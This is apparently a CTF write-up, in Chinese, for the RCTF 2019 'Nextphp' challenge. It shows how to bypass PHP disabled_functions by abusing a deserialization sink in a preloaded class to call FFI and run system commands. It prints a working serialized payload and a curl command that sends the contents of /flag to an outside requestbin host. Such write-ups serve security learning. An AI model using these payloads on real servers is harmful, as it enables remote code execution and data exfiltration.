RCTF 2019

Nextphp

直接给了webshell 看一眼phpinfo

disabled_function ban了一堆，那么显然考察的是bypass disabled_function

搜集信息

这里用了PHP7.4

FFI support    enabled
open_basedir    /var/www/html    /var/www/html
opcache.preload    /var/www/html/preload.php    /var/www/html/preload.php

根据官方文档FFI是可以直接调用系统函数的

比如这样

<?php
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("id > /tmp/eki");
echo file_get_contents("/tmp/eki");
@unlink("/tmp/eki");

但是有个限制是FFI API仅能适用于预加载文件，也就是该题的preload.php

蚁剑连上看下preload.php是啥

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

然后我们就通过这个类反序列化来搞

直接修改下$data即可

    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int php_exec(int type, char *cmd);' //调用php执行命令的函数
    ];

Payload:

?a=$a=unserialize(base64_decode("QzoxOiJBIjo5Nzp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czozNDoiaW50IHBocF9leGVjKGludCB0eXBlLCBjaGFyICpjbWQpOyI7fX0="));var_dump($a->ret->php_exec(2,%27curl%20http://http.requestbin.buuoj.cn/1f4vjz01?a=`cat%20/flag`%27));

参考资料

opcache.preload:

https://wiki.php.net/rfc/preload

FFI 的官方文档：

https://www.php.net/manual/en/ffi.examples-basic.php

https://www.php.net/manual/en/ffi.examples-callback.php